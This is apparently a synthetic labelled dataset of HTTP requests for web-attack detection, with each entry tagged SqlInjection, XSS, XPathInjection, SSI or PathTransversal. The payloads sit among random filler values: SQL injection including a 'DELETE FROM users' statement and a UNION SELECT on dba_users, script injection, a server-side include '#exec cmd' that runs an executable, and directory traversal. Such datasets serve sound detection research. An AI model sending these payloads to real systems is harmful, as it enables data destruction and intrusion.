GET /en5e_.Wi@46DJtrLRQ30/8j@/5dsnRllAtetuaeberBoe/nFmXil5/dhfDr/rnzaeFhtg/lQ-sNSI6Kc/tL-Dx.muYF2Xql/cqy3HHyrSJ1/hTbZWlj3MIK/bYOR0TCKg/fWi.S8Bjhax5eLNbyz.js?uyoHhYNi6tIy6Ms=and++0%3C%3E%28select+++count%28*%29+++++from++csE+++++where+tnhvB3m%3C%3E%29 HTTP/1.1
Host: www.lMnuf.ch:979
Connection: hsCn17
Accept: text/plain;q=0.3, application/*;q=0.4, text/*;q=0.4
Accept-Charset: hz-gb-2312;q=0.3, iso-8859-2, iso-8859-6, iso-8859-4;q=0.2, windows-874;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: alfr5ot='mriaLl'
Client-ip: 196.90.56.27
Cookie: T2tEahros9c=~;U.ZJGMCmzHL-=imabt access_logwherelink
Cookie2: $Version="3"
Date: Tue, 16 Feb 10 11:20:50 UTC
ETag: W/"sEO6-Hh4WcNew12P"
Expect: dmocn7=aanr;osrkld=i8au
From: wIdO@lerc.gov
If-Modified-Since: Tue, 20 Dec 05 08:55:46 GMT
If-Unmodified-Since: Thu, 05 Jul 07 20:59:01 GMT
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "s3oQO.K0pDBrHcoMoKeU"
If-Range: Fri, 14 May 04 23:16:24 CET
Max-Forwards: 0241
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM dDBtTDh5Z2hyQmFibWlzZWxzYmF0T3lkYXhweW5yb2k0Yg==
Range: -0842
Referer: /ts3tne/fywh/e7oooes.wmn
TE: trailers
Trailer: Max-Forwards
User-Agent: eEEaauwtyi/5.5.4.1
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: compress
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 431124702375
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41831
Start - Id: 48254
class: XSS
POST /iu8lJnPAq2in3RcH/oz/unVa0/cVzolWusrcGdZK/execB/.17Ih/eIhndRttktEfasspceIe/esK5C6vHWZted0xQ/pf0/eJaS7JhCQx_rqB@Wk5X/dxml/_FbIRcBW.html? HTTP/1.1
Content-Length: 230
Content-Language: 9nfrpf
Content-Encoding: deflate
Content-Location: /creben/drtbxr/e82w/7Oaeyo4.cgi
Content-MD5: Y2tldHpJc2dORmM2dG91eA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Dec 06 19:37:18 CET
Last-Modified: Sun, 25 Apr 10 24:43:13 GMT
Host: 211.243.185.103:80
Connection: nnxn
Accept: application/zip, video/*;q=0.0, text/html;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: q0ie-feuo, dgopco-aub72inw
Cache-Control: min-fresh=69483
Client-ip: 128.115.74.218
Cookie: cvfor=<div   onmouseover    =  " [alert('iE');]"  >;ebt=0872563;geauaR3=qchild%i
Cookie2: $Version="2"
Date: Thu, 18 Jun 09 02:14:05 UTC
ETag: "GyRoO6woP65L5RNAnX"
Expect: 100-continue
From: oslKrae@1ok4xdre.uk
If-Modified-Since: Fri, 26 Jan 07 13:26:41 CET
If-Unmodified-Since: Sat, 10 Apr 04 02:26:39 UTC
If-Match: *
If-None-Match: "Xb6SCoEGsdpCE0Se26"
If-Range: Tue, 22 Feb 05 14:39:25 CET
Max-Forwards: 8
MIME-Version: 3.0
Pragma: e='zhyad5ih'
Proxy-Authorization: NTLM ZUllc2VkZWhiY2l3MG40c09IdGhhaGVzNnlIYW1pNm85cmRhaWtu
Authorization: pthi nnai4l=Honcoon
Range: 9-39,892590-
Referer: http://4thdo.uk/ieihk/tAegne1c/81Grotc/sdi6.js
TE: gzip;q=0.6,trailers,gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: esxsevtl (e5J@GEPA; nZkghZzJ; aBGI2g_bL)
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9341x017
Via: 4.4 0.153.135.105, HTTP/0.2 178.10.248.172:61413
Transfer-Encoding: identity
Upgrade: eiasuu/6.0, RWCx/1.2, yeae/8.9, aaarsr/5.3
Warning: 342 173.97.45.171 "uivI8e2ePc" "Sat, 10 Mar 07 19:18:29 GMT"
X-Forwarded-For: 233.95.8.172
X-Serial-Number: 73408
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iegoHu=auh4AmlmEIY&7z5DPDcopyJax=e?ttxbsaN&ilHimet=e.nMoDI0&iv@IxtermK0insertEUCtmp= Hm&rgW1tV2=Hdeoet9&OfQV9dMD@BLR=Drcp<6&Ux7varBpba.W=lda titIt&hshis=476577&G2kN9t=032&lyn5it=46&@VEQt7E=37&htdThosrIn=32&jstdinJwwT.=ao8i3lnO

End - Id: 48254
Start - Id: 48638
class: XPathInjection
PUT /a85dZNfkW.226xPuzKZt/enoa4nh30iavtGGsrm5a/ElcieblTmhs/rbrwhlotterea.css? HTTP/1.0
Content-Length: 386
Content-Language: ateirmfe
Content-Encoding: identity
Content-Location: http://nzeo.org/phtvdA/8autmi/6auitr.php
Content-MD5: YWNpZXJtb3VkYlBscjlidw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Apr 07 20:44:54 GMT
Last-Modified: Mon, 21 Jul 08 15:39:47 GMT
Host: www.ntdnwf3hi.org:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=19323
Client-ip: 41.88.127.250
Cookie: Eb0Y=ratDrosi;o5=553;o3ze5eAtHiue=1aamocha7<ea1iej;96XsbwQ=lsiig;tOasn=ht;aThatu=ti
Cookie2: $Version="469"
Date: Sat, 05 May 07 02:25:19 GMT
ETag: W/"YKFJkoH9cKAkRI90WU"
Expect: 100-continue
From: Ninoyjig@whephoIrat.uk
If-Modified-Since: Tue, 14 Jun 05 15:59:49 GMT
If-Unmodified-Since: Tue, 18 Mar 08 03:55:22 GMT
If-Match: "glo3tISo0wY7XwiL"
If-None-Match: "brCnJtpjLY9.zE13"
If-Range: Tue, 18 Jul 06 06:34:57 GMT
Max-Forwards: 838
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM bG4wYVRycm10cnd0c21lM2dzOHNhbmVpb2F0bXNjbXVy
Range: -046912,8351-4,007308-22
Referer: /eedr/nneuiasR/ueey/dIsmnsle.dll
TE: gzip;q=0.1,trailers
Trailer: Range
User-Agent: anegmeaqoexoiet5l81
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 9.3 165.2.191.108
Transfer-Encoding: deflate
Upgrade: ohth/5.2
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 498858561497
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hilesRXasE=ufdwh4a&-xlog3ipIj3=hse4https&do=[s adT|oulibeozt&ch2htetc=7337995&2FW1CyqJjc.V=068&3nehoq0r=eddqblatepd9l7sace&L6swindow.opencmdLwFWM=ahekw3bgknH&B5Ihttplg.YN=@nzn9mstu1arw&tmpE=z%0sT&ene&hssheynuydd0Dgs=20&rex=os3agalnaek&Odig=eadii&acbEdrp6eark=twjt'  or   path/child::node()[position()=N]     or   'shemeve'   ='&nevdi0ht=896655824

End - Id: 48638
Start - Id: 39181
class: SSI
PUT /gWmc8erProddnqkIrt.jpeg? HTTP/1.1
Content-Length: 390
Content-Language: ao5Djet,s,mixtsbe
Content-Encoding: compress
Content-Location: /hhrgre/e0en/rRaH9baR/newecrgb.msf
Content-MD5: aXJhbnk3b2FzbHNlbTFvaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 22:51:56 UTC
Last-Modified: Thu, 02 Jul 09 18:22:50 UTC
Host: 179.63.123.194
Connection: uhn2hnq
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate
Accept-Language: eoOk-inlnoa;q=0.9, tdaitoex-eUre, rRL-hnmdUmt;q=0.1
Cache-Control: only-if-cached
Client-ip: 14.74.123.168
Cookie: eeuxehthnifl=hIfskhgn;idGHoUeU=stSahtaccesYchreplacent;5B11.=ema
Cookie2: $Version="261"
Date: Mon, 29 Sep 08 05:33:55 CET
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
From: usoekn@3fnpm.it
If-Modified-Since: Sun, 27 Jan 08 07:38:27 GMT
If-Unmodified-Since: Sat, 05 Nov 05 13:06:50 CET
If-Match: "gKywMdRB3_fba5@"
If-None-Match: *
If-Range: Mon, 19 Dec 05 02:18:24 GMT
Max-Forwards: 19
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic cnNlaW9yOjFzc2U=
Authorization: Basic ZUlySURkaTpzYXNvbQ==
Range: -4,-09852,71-
Referer: http://vtutt.org/atodtrp/vinies/rtimrTl/hbkfl.bin
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: nibEtdSnms13oef
UA-Disp: 631,569,16
UA-Color: color8
UA-Pixels: 466x9263
Via: 6.1 146.14.85.104, HTTP/0.2 www.7em6i.png, 7.6 www.ets5i.gif
Transfer-Encoding: hevdfl; irtp9b=Zonnrli
Upgrade: obsrun/6.2, Knhh/3.4, neecd/0.5, ttn/3.3
Warning: 671 www.sNedft4.tiff "aEHyset" "Wed, 16 Apr 08 21:11:39 CET"
X-Serial-Number: 2274804334681
~~~~~: ~~~~~~~~~~

aoh=q&n6yticeeebitln=x32zAsLf5A&8hr5tiu=n ztF&kbojv26gFdJR=iny&ufoi7NAami=<!--#email fromhost="www.dpszlh.com" tohost="mailbox.sia.com" message="umrao xd7he7t th totc" fromaddress="n4dbr0.com" toaddress="nyrn.6o.com" subject="da" sender="rmm.com" replyto="enhrA.com" cc="hn" inreplyto="9j ygt 1eeE" id="xdmtmail" -->

End - Id: 39181
Start - Id: 45476
class: PathTransversal
GET /mXPLlvS/voirotaIaoebneiilyo/njq6nI/itocdesaiartehs/sMH.e1iBD9DQ0/otEniot5oieue.tiff?riaromttee=j%2B%29rr0documentd%3Du0%29+&Srm=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fri%2Fme%2Ftrseistron%2Fniorlari.exe&ptehoeD=ehcq6oge%3Bd&s1d9mqeactlhen6=2310094&h5Iechi0=set&IuAEeE=drtlcaOtein HTTP/1.1
Host: 245.107.208.151:52
Connection: close
Accept: */*
Accept-Charset: macintosh;q=0.5
Accept-Encoding: gzip;q=0.8, deflate, gzip, identity
Accept-Language: hAsr-sfdii, fg-vtmksr;q=0.8, os-kSg7lae, lfzpnH-0aaxx, oa-iyhget
Cache-Control: only-if-cached
Client-ip: 172.157.36.227
Cookie: xnetFoshh=ep;nnsQfakiNw=1EFa5RLa;yuob=access_logeH4r
Cookie2: $Version="01"
Date: Fri, 26 Aug 05 18:10:42 UTC
ETag: "u_g0XiWobOrZHoGp"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sun, 31 Dec 06 20:05:24 GMT
If-Unmodified-Since: Sat, 18 Oct 08 06:54:53 GMT
If-Match: "IF0MoCAR@dw@D2VDn92"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: Fri, 13 Oct 06 02:36:22 CET
Max-Forwards: 688
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest username="hesa"
Authorization: 6h7bea eosiQo=t7egN
Range: -48787
Referer: /fNln2ee/9heeit/marein/lssdr5t.exe
TE: gzip;q=0.1
Trailer: Referer
User-Agent: acmg (aeuXMFS.)
UA-CPU: x86
UA-Disp: 1452,073,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5163x468
Via: FTP/2.9 223.210.147.184, FTP/5.7 www.dgESoui.png, 7.6 www.bo3t0es.jpg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45476
Start - Id: 44663
class: PathTransversal
GET /iY7vz-PToZTvWNHbPin_/eg_Euv3Hatr/f4tireiahelse3ls5nn/a0e/sr0d8Snozsbme/aounewgEeoeM/ma0nhza2dIwqinjaeTu.png? HTTP/1.0
Host: www.yTrps.com
Connection: close
Accept: application/*
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.7
Accept-Language: Wsly8pf-w;q=0.6, 2ou8auer-nodrbme;q=0.5, 6A-tr;q=0.1
Cache-Control: only-if-cached
Client-ip: 48.43.170.158
Cookie: nIhpowI2o=file:///T:/ie/5s/eey.xml
Cookie2: $Version="591"
Date: Sat, 19 Jan 08 01:26:27 CET
ETag: W/"S1DTKrFy6bS6emxs"
Expect: dgct7Ia
From: eeuabRn@lal2mty.ch
If-Modified-Since: Fri, 20 Mar 09 18:26:54 UTC
If-Unmodified-Since: Thu, 04 Dec 08 08:50:41 UTC
If-Match: "-Cl5ywwJYRuUK5Zjc"
If-None-Match: "pRjdnLfcnQyk7Z4"
If-Range: "Nv15tIn6rTzYLxTm"
Max-Forwards: 4273
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: yaaa en1t8kel=rwda
Authorization: Basic R2V0czp1ZW11bkE=
Range: 316-826
Referer: /ttEzdsa/hi6kNdra.sh
TE: trailers,gzip;q=0.6,trailers
Trailer: Referer
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 0.7; ti-gs; rv:9.6.7) Gecko/44645566
UA-CPU: PowerPC
UA-Disp: 0905,2233,16
UA-OS: Windows 95
UA-Pixels: 827x397
Via: HTTP/7.8 145.208.135.91
Transfer-Encoding: compress
Upgrade: ewjer/3.6, iieee/3.2, dbnoN/0.4, afTm/9.7
Warning: 228 172.128.177.184 "teeeuO" 
X-Serial-Number: 17192
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44663
Start - Id: 41618
class: SqlInjection
GET /aoKlu/m1TW1/mW8jGxBZERDHA5ZC6GB/ly9Za_x4/pdliat/6-VrGchildwindow.openF@sock_streamGGQxq/dtnAoeotctstnye/1l-790/tneK8GHN2gJz.html?HLfEReXjfNh=%27+++OR+++%27idBtretn%27++++%3C++%27X HTTP/1.0
Host: 244.191.236.161:31
Connection: 1oo7yo
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3yidLo-7oui;q=0.5, O-se;q=0.2, eorH-idswHii
Cache-Control: max-stale=1869
Client-ip: 224.247.255.87
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Sun, 16 Oct 05 10:29:35 CET
ETag: "vz5WQdacqFuv82n8"
Expect: lrfohe
From: tcssd@oays6you.com
If-Modified-Since: Mon, 17 Aug 09 22:58:18 CET
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: *
If-None-Match: "uD5.dA5.g8fBDDRS"
If-Range: Tue, 25 Apr 06 05:14:02 GMT
Max-Forwards: 55
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM aGN0Ym1ld2FsamtvcnRpYXNxRWNjc255b2luYU9pRXJl
Authorization: gacor pelAotem=lk8lt
Range: -27,878-
Referer: /eeeeA/ebil1/0rttCeeE.mpg
TE: trailers,chunked;q=0.5
Trailer: Host
User-Agent: sYS@Ek http://www.ne51n.com
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/7.8 www.eiuCro.css, HTTP/8.5 www.2iertm.jpeg, 6.4 158.50.218.211
Transfer-Encoding: compress
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41618
Start - Id: 40296
class: SSI
GET /oTbhmWnd/esf1L/HZunopenz/enUM.vM7fA/rp60t/eOtk9l/k4ns3/uj06TzdQ/oZ7r/siaCPfW6LHtHxfoyr.js?mb4eeitgu=%3C%21--++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Ceniagw%5Cmeyfc%5C99T5E5.exe+d%3A%5CoFeal%5Cwww.ranallic.org%5C1mlrsyt%5Cdatabase.mdb+%2Fx++++exporttofoxpro%22--%3E HTTP/1.0
Host: www.ces8.net
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.8, deflate, compress, identity
Accept-Language: f-3i;q=0.4
Cache-Control: no-cache
Client-ip: 27.205.84.231
Cookie: leeisrU4a=bMw8-5r1u2_;adfdhv6M=~ser@;psst=dyJ2wiIA;hcdheAHneqtNzi5=teglo3f4i;thp9th=nebin4boot.inifZAkm'j;rnsbva=hhl2sgrzexeoki
Cookie2: $Version="973"
Date: Mon, 08 May 06 06:24:18 CET
ETag: W/"cZahXkYy1L59OAb"
Expect: 100-continue
From: sinl@n3biht.ch
If-Modified-Since: Wed, 30 Dec 09 14:58:30 UTC
If-Unmodified-Since: Wed, 18 Jan 06 21:20:37 CET
If-Match: "CZPNhKVbIgoCdwXQbhx"
If-None-Match: *
If-Range: "PHyY9dc1tgh1y@K"
Max-Forwards: 0
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: oeos goaweqW=tqMehbrx
Authorization: Digest response="3f31C46cFe8c67aF5E5a5aF39FC6de6F"
Range: 5-
Referer: /rhveffqi/onueGdme/ebrhH/hpEmS.avi
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 2.5; 2e-k8; rv:1.3.0) Gecko/49060518
UA-CPU: MIPS
UA-Disp: 2515,7751,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2184x777
Via: 7.4 9.228.109.107, 5.8 www.2olxmhsa.js
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40296
Start - Id: 41985
class: SqlInjection
GET /yStPh1.ntcLBC/lbe/tqQ4GPfYfbXhK9wI3G.tiff?emssaly4anml=ua8%27++++%29%3B++DELETE++FROM+++++users+++++WHERE++upper%28username%29+++++%3D+++upper%28++%27admin&dedNbe9hpA=02667753&eA=580&5fmaesit=133&cs1cpexae2gn54a=olip6Qp%40iuz&nfeeAin=apeooinose%3CsoelSsam&ejegyreu7hln=qlft0e4e&dueuii53ozwe4=uu&sl=tatow&kF-jdr0l=o+openxeprr%5Cser HTTP/1.0
Host: www.0a9Teal.net:62218
Connection: pS5lynh
Accept: text/html;q=0.7
Accept-Charset: windows-874, utf-7, big5, x-mac-chinesetrad;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=06912
Client-ip: 41.133.176.17
Cookie: hcg=5375748072
Cookie2: $Version="9"
Date: Wed, 30 Jul 08 02:54:02 GMT
ETag: "H-wtGNRWTakDfVw7"
Expect: taus=aiyn
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 24 Nov 08 05:30:00 GMT
If-Unmodified-Since: Mon, 12 Sep 05 23:55:48 GMT
If-Match: "faCz9wCgdUUd@o@eBepe"
If-None-Match: *
If-Range: *
Max-Forwards: 4843
MIME-Version: 0.8
Pragma: otniwcif='n7l'
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest nc=dae49E08
Range: -728027,84041-8,736156-
Referer: /iarps/entd6/whrraN.cfm
TE: chunked;q=0.7,chunked
Trailer: Accept-Charset
User-Agent: she3sueroeavtlb
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8709x899
Via: 6ucKLt/1.7 www.betno.jpeg, FTP/6.9 219.111.145.75
Transfer-Encoding: gzip
Upgrade: tsem/9.8, icrMn/2.4
Warning: 119 141.109.167.27 "sebrw" 
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 772384141
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41985
Start - Id: 42779
class: SqlInjection
PUT /jt5ezeatrm9orrmhbm/otmoXeswci/hfitaiemawreeaElx/liehr/9unao/ROkRo@l1openYXbI7A/nlL3.ekR0P.jpeg? HTTP/1.0
Content-Length: 228
Content-Language: w,5tcre,ijhqn
Content-Encoding: identity
Content-Location: http://www.nKoottet.be/Irhnef/3syn/endlp.mpeg
Content-MD5: RWZvdFNudFVuc2NzaWV1ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Feb 10 02:09:31 GMT
Last-Modified: Mon, 15 Nov 04 10:52:14 GMT
Host: 240.99.20.174
Connection: close
Accept: video/mpeg;q=0.1, audio/*;q=0.7
Accept-Charset: euc-jp;q=0.9
Accept-Encoding: identity, compress;q=0.3, deflate;q=0.0
Accept-Language: zdta-d8oi;q=0.9, m-t;q=0.3
Cache-Control: min-fresh=61026
Client-ip: 47.99.144.191
Cookie: ildattlalr0=ss;roe1qzrtuaenEn=or 0<>(select   count(*)   from     ai2kfnn);edsMtBUdnQu=w1bUVRn0Ca;Etxe=n
Cookie2: $Version="5"
Date: Thu, 09 Mar 06 21:20:21 UTC
ETag: "@JgiXDUnKhU3huPA"
Expect: 100-continue
If-Modified-Since: Sat, 06 May 06 17:34:32 CET
If-Unmodified-Since: Fri, 12 Feb 10 15:46:34 CET
If-Match: "nXMIV2odrVkr1x@h-4"
If-None-Match: *
If-Range: *
Max-Forwards: 97
MIME-Version: 2.2
Pragma: ot1mtn=eho
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: itswgn oyal=heItktt
Range: -440,44150-
Referer: /8akhbu.tar.gz
TE: gzip,deflate,chunked
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (X11; U; Linux i386 4.0; ct-Se; rv:7.5.0) Gecko/02970069
UA-CPU: MIPS
UA-OS: Win95
UA-Pixels: 449x877
Via: FTP/1.0 6.174.194.200, 0.9 162.155.5.243
Transfer-Encoding: deflate
Upgrade: i5smn/7.9, wuhi/9.9, 69t/0.2, xRj6/5.5, iLew/9.1
Warning: 256 254.235.154.160 "sblPrrtsrdh" 
X-Serial-Number: 58260161
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

tqnirdo=arlte5k6meupdate1gd&rz3adjaoO=onGktZev&li=o s&estehte7=9esli&dAFQqQ=nformmab&ls5llefdajai=x-gY-&gt=arz&yo=hNov&etcsncopoe=rylyriLe3scs&sr6ongaeris=soieeoe]rfr9m7r&vTM=$-t div&7wap4h9AhMunah=aeeaooaaR'ey&Cdnd=070864

End - Id: 42779
Start - Id: 42724
class: SqlInjection
POST /lly.shtml? HTTP/1.1
Content-Length: 41
Content-Language: o,Wddi,s
Content-Encoding: gzip
Content-Location: http://www.fteqy.cz/ig6swtae.nsf
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Feb 04 05:40:48 CET
Last-Modified: Tue, 08 Nov 05 06:20:35 UTC
Host: www.sipja.ch
Connection: keep-alive
Accept: audio/*;q=0.2, video/mpeg;q=0.6, video/*;q=0.9
Accept-Charset: iso-8859-2;q=0.5, utf-7;q=0.5, utf-7;q=0.2, us-ascii;q=0.3, x-mac-turkish
Accept-Encoding: identity;q=0.5, deflate, deflate;q=0.4
Accept-Language: *;q=0.6
Cache-Control: min-fresh=008
Client-ip: 90.28.189.51
Cookie: 6EzNVsge2lX= urfeMhtacceslw
Cookie2: $Version="258"
Date: Sat, 08 Jul 06 05:36:08 UTC
ETag: W/"FP2xdaPt@08NUFp"
If-None-Match: "NBLvneg27-nVwRj"
Pragma: no-cache
Authorization: joi3 trOcvaas=rdle3
Referer: /eseitsa/oy7in/07istlno/ikeuhb.exe
User-Agent: or    0<>(select     count(*)    from     9bqseta)
UA-CPU: x86
UA-Disp: 0603,672,16
Via: hnrsos/2.0 58.100.5.245:2
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EnetcateH4n7m-=aaaetm&aceuxn=m)&tn=b]

End - Id: 42724
Start - Id: 47436
class: XSS
GET /nineoukxcmedOedhe/rIW_UR/t1tieaKecrthbol.sh?ndhassaA=emjx&_i8M=BeiorurbiitbmlneL&RrWz0E=%3Cdiv++style+++%3D+%22background-image%3A++url%28javascript%3A++%5Balert+++%28%27ue%27%29%3B%5D%29%3B%22++++%3E&sephnoa=-js&nhhfslcrde4e=xmlahhnode3len%3Ary5null&onhal64hCq=w%271&adaoePioo=br%2F%29%28rlrwindow.openi+aun+yinputlsnode&c4yemeyaaInrild=s&yuuoNCqhportt=80&y2eevtmrqntdlnw=519&Mbeietmtp=nb32tansoiRL HTTP/1.0
Host: www.pemlIm.gov:80
Connection: oDsnt2ar
Accept: video/mpeg, video/*;q=0.8
Accept-Charset: iso-8859-8-i;q=0.9, x-mac-roman;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 184.190.224.215
Cookie: 8PA4WFd=ps;snd=5
Cookie2: $Version="05"
Date: Fri, 26 Dec 08 10:20:12 GMT
ETag: W/"USbOQLZFotY12CP"
Expect: 100-continue
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Wed, 27 Oct 04 12:08:11 UTC
If-Match: "Cvs8l.g3YbM91wG"
If-None-Match: *
If-Range: Fri, 19 Jun 09 18:29:02 UTC
Max-Forwards: 0
MIME-Version: 3.0
Pragma: nee='mai'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest nonce
Range: 13744-31405
Referer: /yto9i/pieo/sd9ibti6.exe
TE: chunked
Trailer: If-Range
User-Agent: rte4 (e4hpoAcj; mCmFk.s2G.; epT4b5l)
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: 2.7 www.esineboj.gif, 2.9 193.87.222.72, HTTP/2.0 www.senp.html
Transfer-Encoding: neR6
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47436
Start - Id: 41236
class: SqlInjection
GET /1rnagSexq43mno9wotyr/nHZJ/zFOcUVHU_n./oeus9/mnkhArihalpoeorna/fZrlaanantaoaveskgah/lkgu79D/nrhw/lio6olykepgrsalu/bc@4Xju@55dc0LWL-/UrselectHdI.jpg?tsh=tdo+aayyrptn&1e8dNernlsndy=119&hcneraaldmgsl1=kim4ehTf&WaconnectTNc=3547814&azKsbj4allMmall=tamt06ho&LLXEV0d1Q=36430&oocHoo=n%7E&roaaetreys7e=fRnah2cseyiaUn&dve=4 HTTP/1.0
Host: www.lqrt5Xse.uk
Connection: wena
Accept: */*
Accept-Charset: *
Accept-Encoding: chairs' UNION  SELECT yotnf FROM  dba_users    WHERE name   like  '%25
Accept-Language: 6Ncrn-sjwd
Cache-Control: noonhn=c
Client-ip: 60.55.177.86
Cookie: qzjbgsoundFprocessing-instruction1=67;ch=1aIgerejr;33OdCow2EP=qde4;0eitenasosttvmi=eVu;0e=885;ay0oDrnmseasrr=gi
Cookie2: $Version="6"
Date: Sat, 26 Jan 08 12:31:49 CET
ETag: W/"bHU.KVU-HPmOIYHv"
Expect: 100-continue
From: zcrNz@rbAtdcsnm.cz
If-Modified-Since: Fri, 01 Jan 10 06:17:44 CET
If-Unmodified-Since: Sun, 15 Mar 09 11:08:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Jan 09 23:10:29 CET
Max-Forwards: 323
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM ZjA3aWl0ZWlzUjFyZWJlNHRqZWRtc3NyZW91ZWVsaWx0bk5vdGhSdGlyc203bQ==
Authorization: NTLM ZW0ydGV1ZGVtZlJ2YWNhaWJ4OWluYTlFZWRzeGZ5NUxlZXBvdHJh
Range: -50
Referer: http://oegeT.fr/oeee/rn49l/aefDsih/fepuayp.js
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: qtoO2Msoap/5.3.1.0
UA-CPU: MIPS
UA-Disp: 016,7142,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8507x042
